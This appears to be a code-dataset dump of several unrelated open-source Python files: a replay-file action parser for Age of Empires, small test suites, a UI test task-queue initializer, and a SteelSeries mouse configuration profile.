self._RunAsync(FinishServerLog)
self.assertEqual(0, len(persistor._handlers))
self.assertEqual(3, len(persistor.batches))
def _VerifyLog(self, exp_msgs, callback):
"""Verifies that there are len('exp_msg') batches stored
and that each contains the expected message as contents.
"""
def _DoVerify():
batches = self._persistor.batches
self.assertEqual(len(batches), len(exp_msgs))
for key, msg in zip(sorted(batches.keys()), exp_msgs):
value = batches[key].buffer
regexp = re.compile('\[pid:[0-9]+\] .*:[0-9]+: %s' % msg)
self.assertTrue(regexp.search(value) is not None, '%s not found in %s' % (msg, value))
callback()
self.io_loop.add_callback(_DoVerify)
class ServerLogHandlerTestCase(BaseTestCase, testing.LogTrapTestCase):
def testErrorCounters(self):
"""Verify that error-counting performance counters are working correctly.
These performance counters are implemented as a log filter.
"""
meter = counters.Meter(counters.counters.viewfinder.errors)
InitServerLog(_FakePersistor())
def _CheckCounters(expected_errors, expected_warnings):
sample = meter.sample()
self.assertEqual(expected_errors, sample.viewfinder.errors.error)
self.assertEqual(expected_warnings, sample.viewfinder.errors.warning)
_CheckCounters(0, 0)
old_level = logging.getLogger().level
logging.getLogger().setLevel(logging.DEBUG)
logging.critical('Critical')
logging.error('Error1')
logging.warning('Warning1')
logging.warning('Warning2')
logging.getLogger().setLevel(old_level)
self._RunAsync(FinishServerLog)
_CheckCounters(2, 2)
_CheckCounters(0, 0)
|
mgz/body/actions.py | Namek/aoc-mgz | 117 | 12730158 | """Actions."""
from construct import (Array, Byte, Const, CString, Flag, Float32l, If,
Int16ul, Int32sl, Int32ul, Padding, Peek, String,
Struct, this, Bytes, Embedded, IfThenElse)
from mgz.body.achievements import achievements
from mgz.enums import (DiplomacyStanceEnum, FormationEnum, GameActionModeEnum,
OrderTypeEnum, ReleaseTypeEnum, ResourceEnum,
ResourceLevelEnum, RevealMapEnum, StanceEnum,
AgeEnum, VictoryEnum)
from mgz.util import TimeSecAdapter, check_flags
# pylint: disable=invalid-name, bad-continuation
# Not all actions are defined, not all actions are complete.
interact = "interact"/Struct(
"player_id"/Byte,
Const(b"\x00\x00"),
"target_id"/Int32ul,
"selected"/Int32ul,
"x"/Float32l,
"y"/Float32l,
"next"/Peek(Bytes(8)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(8)),
"unit_ids"/If(lambda ctx: ctx.selected < 0xff, Array(
lambda ctx: ctx.selected, "unit_ids"/Int32ul
))
)
give_attribute = "give_attribute"/Struct(
"player_id"/Byte,
"target_id"/Byte,
"attribute"/Byte,
"amount"/Float32l
)
add_attribute = "add_attribute"/Struct(
"player_id"/Byte,
"attribute"/Byte,
Padding(1),
"amount"/Float32l
)
create = "create"/Struct(
Padding(1),
"unit_type"/Int16ul,
"player_id"/Byte,
Padding(1),
"x"/Float32l,
"y"/Float32l,
"z"/Float32l
)
ai_interact = "ai_interact"/Struct(
Padding(3),
"target_id"/Int32ul,
"selected"/Byte,
Padding(3),
"x"/Float32l,
"y"/Float32l,
If(lambda ctx: ctx.selected < 0xff, Array(
lambda ctx: ctx.selected, "unit_ids"/Int32ul
))
)
move = "move"/Struct(
"player_id"/Byte,
Const(b"\x00\x00"),
Padding(4),
"selected"/Int32ul,
"x"/Float32l,
"y"/Float32l,
If(lambda ctx: ctx.selected < 0xff, Struct(
"next"/Peek(Bytes(8)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(8))
)),
"unit_ids"/If(lambda ctx: ctx.selected < 0xff, Array(
lambda ctx: ctx.selected, Int32ul
))
)
ai_move = "ai_move"/Struct(
"selected"/Byte,
"player_id"/Byte,
"player_num"/Byte,
Padding(4),
Padding(4),
"target_id"/Int32ul,
Padding(1),
Padding(3),
"x"/Float32l,
"y"/Float32l,
Padding(4),
Padding(4),
Padding(4),
If(lambda ctx: ctx.selected > 0x01, Array(
lambda ctx: ctx.selected, "unit_ids"/Int32ul
))
)
resign = "resign"/Struct(
"player_id"/Byte,
"player_num"/Byte,
"disconnected"/Flag
)
spec = "spec"/Struct(
Padding(lambda ctx: ctx._._.length - 1)
)
queue = "queue"/Struct(
Padding(3),
"building_id"/Int32ul,
"unit_type"/Int16ul,
"number"/Int16ul,
)
multiqueue = "multiqueue"/Struct(
Padding(3),
"unit_type"/Int16ul,
"num_buildings"/Byte,
"queue_amount"/Byte,
Array(lambda ctx: ctx.num_buildings, "building_ids"/Int32ul)
)
ai_queue = "ai_queue"/Struct(
Padding(3),
"building_id"/Int32ul,
"player_id"/Int16ul,
"unit_type"/Int16ul,
Padding(4)
)
research = "research"/Struct(
Padding(3),
"building_id"/Int32ul,
"player_id"/Int16ul,
"next"/Peek(
Struct(
Padding(6),
"check"/Int32sl
)
),
IfThenElse(lambda ctx: ctx.next.check == -1,
Embedded(Struct(
"selected"/Int16ul,
"technology_type"/Int32ul,
Array(lambda ctx: ctx.selected, "selected_ids"/Int32sl)
)),
Embedded(Struct(
"technology_type"/Int16ul,
Array(1, "selected_ids"/Int32sl)
))
)
)
sell = "sell"/Struct(
"player_id"/Byte,
ResourceEnum("resource_type"/Byte),
"amount"/Byte,
Padding(4)
)
buy = "buy"/Struct(
"player_id"/Byte,
ResourceEnum("resource_type"/Byte),
"amount"/Byte,
Padding(4)
)
stop = "stop"/Struct(
"selected"/Byte,
Array(lambda ctx: ctx.selected, "object_ids"/Int32ul)
)
stance = "stance"/Struct(
"selected"/Byte,
StanceEnum("stance_type"/Byte),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
guard = "guard"/Struct(
"selected"/Byte,
Padding(2),
"guarded_unit_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
follow = "follow"/Struct(
"selected"/Byte,
Padding(2),
"followed_unit_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
formation = "formation"/Struct(
"selected"/Byte,
"player_id"/Int16ul,
FormationEnum("formation_type"/Int32ul),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
save = "save"/Struct(
"exited"/Flag,
"player_id"/Byte,
"filename"/CString(encoding='latin1'),
Padding(lambda ctx: ctx._._.length - 23),
"checksum"/Int32ul
)
chapter = "chapter"/Struct(
"player_id"/Byte
)
build = "build"/Struct(
"selected"/Byte,
"player_id"/Int16ul,
"x"/Float32l,
"y"/Float32l,
"building_type"/Int32ul,
Padding(4),
"sprite_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
game = "game"/Struct(
"mode"/GameActionModeEnum("mode_id"/Byte),
"player_id"/Byte,
Padding(1),
"diplomacy"/If(this.mode == 'diplomacy', Struct(
"target_player_id"/Byte,
Padding(3),
"stance_float"/Float32l,
"stance"/DiplomacyStanceEnum("stance_id"/Byte),
)),
"speed"/If(this.mode == 'speed', Struct(
Padding(4),
"speed"/Float32l,
Padding(1)
)),
"instant_build"/If(this.mode == 'instant_build', Struct(
Padding(9)
)),
"quick_build"/If(this.mode == 'quick_build', Struct(
"status"/Flag,
Padding(8),
)),
"allied_victory"/If(this.mode == 'allied_victory', Struct(
"player_id"/Byte,
"status"/Flag,
Padding(7)
)),
"cheat"/If(this.mode == 'cheat', Struct(
"cheat_id"/Byte,
Padding(8)
)),
"unk0"/If(this.mode == 'unk0', Struct(
Padding(9)
)),
"spy"/If(this.mode == 'spy', Struct(
Padding(9)
)),
"unk1"/If(this.mode == 'unk1', Struct(
Padding(9)
)),
"farm_queue"/If(this.mode == 'farm_queue', Struct(
"amount"/Byte, # this seems to be a bit inconsistent between versions, needs more research
Padding(8)
)),
"farm_unqueue"/If(this.mode == 'farm_unqueue', Struct(
"amount"/Byte, # this seems to be a bit inconsistent between versions, needs more research
Padding(8)
)),
# toggle farm auto seed queue
"farm_autoqueue"/If(this.mode == 'farm_autoqueue', Struct(
Padding(9)
)),
"fishtrap_queue" / If(this.mode == 'fishtrap_queue', Struct(
"amount" / Byte,
Padding(8)
)),
"fishtrap_unqueue" / If(this.mode == 'fishtrap_unqueue', Struct(
"amount" / Byte,
Padding(8)
)),
# toggle fish trap auto place queue
"fishtrap_autoqueue"/If(this.mode == 'fishtrap_autoqueue', Struct(
Padding(9)
)),
# toggles the default stance when units are created. All players start on aggressive by default, if the player
# (initially) has defensive enabled it is called right before the first unit is queued, and again every time
# the player toggles it in the game options menu
"default_stance" / If(this.mode == 'default_stance', Struct(
Padding(9)
)),
Padding(3)
)
droprelic = "droprelic"/Struct(
Const(b"\x00\x00\x00"),
'unit_id'/Int32ul
)
wall = "wall"/Struct(
"selected"/Byte,
"player_id"/Byte,
IfThenElse(lambda ctx: ctx._._.length - 16 - (ctx.selected * 4) == 8,
Embedded(Struct(
Padding(1),
"start_x"/Int16ul,
"start_y"/Int16ul,
"end_x"/Int16ul,
"end_y"/Int16ul,
"building_id"/Int32ul,
Padding(4),
"flags"/Bytes(4)
)),
Embedded(Struct(
"start_x"/Byte,
"start_y"/Byte,
"end_x"/Byte,
"end_y"/Byte,
Padding(1),
"building_id"/Int32ul,
Padding(4),
))
),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
delete = "delete"/Struct(
Padding(3),
"object_id"/Int32ul,
"player_id"/Int32ul
)
attackground = "attackground"/Struct(
"selected"/Byte,
Padding(2),
"x"/Float32l,
"y"/Float32l,
"next"/Peek(Bytes(4)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
tribute = "tribute"/Struct(
"player_id"/Byte,
"player_id_to"/Byte,
ResourceEnum("resource_type"/Byte),
"amount"/Float32l,
"fee"/Float32l
)
repair = "repair"/Struct(
"selected"/Byte,
Padding(2),
"repaired_id"/Int32ul,
"next"/Peek(Bytes(4)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
release = "release"/Struct(
"selected"/Int16ul,
Padding(1),
"x"/Float32l, # -1 if none
"y"/Float32l, # -1 if none
ReleaseTypeEnum("release_type"/Byte),
Padding(3),
"release_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
"""
unload = "unload"/Struct(
"selected"/Int16ul,
Padding(1),
"x"/Float32l, # -1 if none
"y"/Float32l, # -1 if none
Padding(4),
Padding(4), # 0xffffffff
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
"""
togglegate = "togglegate"/Struct(
Padding(3),
"gate_id"/Int32ul
)
flare = "flare"/Struct(
Padding(7),
Array(9, "player_ids"/Byte),
Padding(3),
"x"/Float32l,
"y"/Float32l,
"player_id"/Byte,
"player_number"/Byte,
Padding(2)
)
order = "order"/Struct(
"selected"/Byte,
Padding(2),
"building_id"/Int32sl, # -1 cancels production queue
OrderTypeEnum("order_type"/Byte),
"cancel_order"/Byte, # when cancelling production queue, this indicates which item in the queue is to be cancelled
Padding(2),
"x"/Float32l,
"y"/Float32l,
Padding(4), # const
"next"/Peek(Bytes(4)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
)
gatherpoint = "gatherpoint"/Struct(
"selected"/Byte,
Padding(2),
"target_id"/Int32ul,
"target_type"/Int32ul,
"x"/Float32l,
"y"/Float32l,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
townbell = "townbell"/Struct(
Padding(3),
"towncenter_id"/Int32ul,
"active"/Int32ul
)
"""Patrol
10 X-coordinates followed by 10 Y-coordinates
First of each is popped off for consistency with other actions
"""
patrol = "patrol"/Struct(
"selected"/Byte,
"waypoints"/Int16ul,
"x"/Float32l,
Array(9, "x_more"/Float32l),
"y"/Float32l,
Array(9, "y_more"/Float32l),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
)
waypoint = "waypoint"/Struct(
Padding(1),
"selected"/Byte,
"x"/Byte,
"y"/Byte,
"building_ids"/If(lambda ctx: ctx.selected != 255, Array(
lambda ctx: ctx.selected, Int32ul
))
)
ai_waypoint = "ai_waypoint"/Struct(
"selected"/Byte,
"waypoint_count"/Byte,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
Array(lambda ctx: ctx.waypoint_count, "x_more"/Byte),
Array(lambda ctx: ctx.waypoint_count, "y_more"/Byte)
)
backtowork = "backtowork"/Struct(
Padding(3),
"towncenter_id"/Int32ul
)
ai_command = "ai_command"/Struct(
Padding(lambda ctx: ctx._._.length - 1)
)
"""DE Queue
In DE queue and multi queue share the same command
"""
de_queue = "de_queue"/Struct(
"player_id"/Byte,
"building_type"/Int16ul,
"selected"/Byte,
Padding(1),
"unit_type"/Int16ul,
"queue_amount"/Byte,
Padding(1),
Array(lambda ctx: ctx.selected, "building_ids"/Int32ul)
)
"""DE Attack Move
It's almost the same as Patrol.
10 X-coordinates followed by 10 Y-coordinates
First of each is popped off for consistency with other actions
"""
de_attackmove = "de_attackmove"/Struct(
"selected"/Byte,
"waypoints"/Int16ul,
"x"/Float32l,
Array(9, "x_more"/Float32l),
"y"/Float32l,
Array(9, "y_more"/Float32l),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
)
postgame = "achievements"/Struct(
Padding(3),
"scenario_filename"/String(32, padchar=b'\x00', trimdir='right', encoding='latin1'),
"player_num"/Byte,
"computer_num"/Byte,
Padding(2),
Peek("duration_int"/Int32ul),
TimeSecAdapter("duration"/Int32ul),
"cheats"/Flag,
"complete"/Flag,
Padding(2),
"db_checksum"/Int32ul,
"code_checksum"/Int32ul,
"version"/Float32l,
"map_size"/Byte,
"map_id"/Byte,
"population"/Int16ul,
Peek("victory_type_id"/Byte),
VictoryEnum("victory_type"/Byte),
Peek("starting_age_id"/Byte),
AgeEnum("starting_age"/Byte),
Peek("starting_resources_id"/Byte),
ResourceLevelEnum("starting_resources"/Byte),
"all_techs"/Flag,
"random_positions"/Flag,
RevealMapEnum("reveal_map"/Byte),
"is_deathmatch"/Flag,
"is_regicide"/Flag,
"starting_units"/Byte,
"lock_teams"/Flag,
"lock_speed"/Flag,
Padding(1),
Array(lambda ctx: ctx.player_num, achievements),
Padding(4),
Array(lambda ctx: (8 - ctx.player_num) * 63, Padding(4)),
)
de_autoscout = "de_autoscout"/Struct(
"selected"/Byte,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
|
tests/system/test_state_manager.py | ajw0100/professional-services-data-validator | 167 | 12730219 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from data_validation import state_manager
GCS_STATE_PATH = "gs://pso-kokoro-resources/state/"
TEST_CONN_NAME = "example"
TEST_CONN = {
"source_type": "BigQuery",
"project_id": "my-project",
}
def test_get_gcs_file_path():
manager = state_manager.StateManager(GCS_STATE_PATH)
result_path = manager._get_gcs_file_path(GCS_STATE_PATH + "file/path/name.json")
assert result_path == "state/file/path/name.json"
def test_gcs_create_and_get_connection_config():
manager = state_manager.StateManager(GCS_STATE_PATH)
manager.create_connection(TEST_CONN_NAME, TEST_CONN)
config = manager.get_connection_config(TEST_CONN_NAME)
assert config == TEST_CONN
def test_list_connections():
manager = state_manager.StateManager(GCS_STATE_PATH)
expected = set(["example", "my_bq_conn"])
connections = manager.list_connections()
assert set(connections) == expected
def test_create_invalid_gcs_path_raises():
# Unknown file paths will be created by the state manager
files_directory = "gs://!!bucket!!/this/path/"
with pytest.raises(ValueError, match=r"GCS Path Failure .*"):
state_manager.StateManager(files_directory)
|
AutotestFramework/runfunc/ui_initial.py | yangjourney/sosotest | 422 | 12730227 | <gh_stars>100-1000
import logging
import logging.handlers
import socket,os,threading
from core.const.Do import Do
from core.const.GlobalConst import ExecStatus
from core.tools.DBTool import DBTool
from core.tools.TypeTool import TypeTool
from runfunc.initial import init_logging
from runfunc.ui_threadProcess import *
from core.config.InitConfig import *
import socket,traceback,os
from core.tools.CommonFunc import *
from allmodels_ui.UITestTask import UITestTask
from threads.UITaskThread import UITaskThread
from copy import deepcopy
##########################################################################################################
##########################################################################################################
##########################################################################################################
uiTaskQueue = []
uiTaskCancelQueue = []
maxUITaskThreadNums = 7 #最大能并行的UI测试任务数量
maxWebThreadNums = 5
maxAndroidThreadNums = 3
maxIosThreadNums = 4
executingWebThreadNum = 0 #当前执行中的UI测试任务数量
executingIosThreadNum = 0 #当前执行中的UI测试任务数量
executingAndroidThreadNum = 0 #当前执行中的UI测试任务数量
executingUITaskThreadNum = 0 #当前执行中的UI测试任务数量
executintUITaskThreadDict = {} #当前活着的threadDict
executintWebThreadDict = {} #当前活着的threadDict
executintIosThreadDict = {} #当前活着的threadDict
executintAndroidThreadDict = {} #当前活着的threadDict
##########################################################################################################
##########################################################################################################
##########################################################################################################
def init_ui_task_queue():
db = DBTool().initGlobalDBConf()
# DONE 初始化 taskrun {'do': 3, 'TaskExecuteId': '1'}
colsStr = "id"
tbName = "tb_ui_test_execute"
whereStr = "execStatus = %d or execStatus = %d " % (ExecStatus.NOTRUN, ExecStatus.RUNNING)
orderBy = "addTime asc"
sql = "select %s from %s where %s order by %s" % (colsStr, tbName, whereStr, orderBy)
res = db.execute_sql(sql)
#重置所有模拟器
mobileServer = db.execute_sql("UPDATE tb_ui_mobile_server SET STATUS = 0")
db.release()
logging.debug("init_ui_task_queue: 初始化tb_ui_test_execute结果:%s" % str(res))
if res == False:
logging.error("init_ui_task_queue: 初始化任务执行队列失败!")
return False
if mobileServer == False:
logging.error("init_ui_task_queue: 初始化模拟器状态失败!")
return False
for tRes in res:
tmpData = {}
tmpData[Do.KEY_DO] = Do.TYPE_UITASK_EXECUTE
tmpData[Do.KEY_UITASK_EXEC_ID] = tRes['id']
uiTaskQueue.append(tmpData)
logging.info("init_ui_task_queue: uiTaskQueue加入新data:%s 。来源表:%s" % (tmpData, tbName))
logging.info("init_ui_task_queue: uiTaskQueue:%s" % uiTaskQueue)
logging.info("init_ui_task_queue: 初始化任务执行表完成uiTaskQueue:%s" % uiTaskQueue)
def init_cancel_ui_task_queue():
db = DBTool().initGlobalDBConf()
# DONE 初始化 taskrun {'do': 3, 'TaskExecuteId': '1'}
colsStr = "id"
tbName = "tb_ui_test_execute"
whereStr = "execStatus = %d " % (ExecStatus.CANCELING)
orderBy = "addTime asc"
sql = "select %s from %s where %s order by %s" % (colsStr, tbName, whereStr, orderBy)
res = db.execute_sql(sql)
db.release()
logging.debug("init_cancel_ui_task_queue: 初始化tb_ui_test_execute结果:%s" % str(res))
if res == False:
logging.error("init_cancel_ui_task_queue: 初始化任务执行队列失败!")
return False
for tRes in res:
tmpData = {}
tmpData[Do.KEY_DO] = Do.TYPE_UITASK_CANCEL
tmpData[Do.KEY_UITASK_EXEC_ID] = tRes['id']
uiTaskCancelQueue.append(tmpData)
logging.info("init_cancel_ui_task_queue: uiTaskCancelQueue加入新data:%s 。来源表:%s" % (tmpData, tbName))
logging.info("init_cancel_ui_task_queue: uiTaskCancelQueue:%s" % uiTaskCancelQueue)
logging.info("init_cancel_ui_task_queue: 初始化任务执行表完成uiTaskCancelQueuee:%s" % uiTaskCancelQueue)
|
rivalcfg/devices/rival3_wireless.py | Clueninja/rivalcfg | 604 | 12730234 | <gh_stars>100-1000
from .. import usbhid
profile = {
"name": "SteelSeries Rival 3 Wireless",
"models": [
{
"name": "SteelSeries Rival 3 Wireless (2.4 GHz mode)",
"vendor_id": 0x1038,
"product_id": 0x1830,
"endpoint": 3,
},
],
"settings": {
"sensitivity": {
"label": "Sensibility presets",
"description": "Set sensitivity preset (DPI)",
"cli": ["-s", "--sensitivity"],
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x20],
"value_type": "multidpi_range",
"input_range": [100, 18000, 100],
"output_range": [0x00, 0xD6, 1.2],
"dpi_length_byte": 2,
"first_preset": 1,
"count_mode": "number",
"max_preset_count": 5,
"default": "400, 800, 1200, 2400, 3200",
},
"polling_rate": {
"label": "Polling rate",
"description": "Set polling rate (Hz)",
"cli": ["-p", "--polling-rate"],
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x17],
"value_type": "choice",
"choices": {
125: 0x03,
250: 0x02,
500: 0x01,
1000: 0x00,
},
"default": 1000,
},
"buttons_mapping": {
"label": "Buttons mapping",
"description": "Set the mapping of the buttons",
"cli": ["-b", "--buttons"],
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x19],
"value_type": "buttons",
# fmt: off
"buttons": {
"Button1": {"id": 0x01, "offset": 0x00, "default": "button1"},
"Button2": {"id": 0x02, "offset": 0x05, "default": "button2"},
"Button3": {"id": 0x03, "offset": 0x0A, "default": "button3"},
"Button4": {"id": 0x04, "offset": 0x0F, "default": "button4"},
"Button5": {"id": 0x05, "offset": 0x14, "default": "button5"},
"Button6": {"id": 0x06, "offset": 0x19, "default": "dpi"},
},
"button_field_length": 5,
"button_disable": 0x00,
"button_keyboard": 0x51,
"button_multimedia": 0x61,
"button_dpi_switch": 0x30,
"button_scroll_up": 0x31,
"button_scroll_down": 0x32,
# fmt: on
"default": "buttons(button1=button1; button2=button2; button3=button3; button4=button4; button5=button5; button6=dpi)",
},
},
"battery_level": {
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0xAA, 0x01],
"response_length": 3,
"is_charging": lambda data: bool(data[2]),
"level": lambda data: int(data[0]),
},
"save_command": {
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x09],
},
}
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.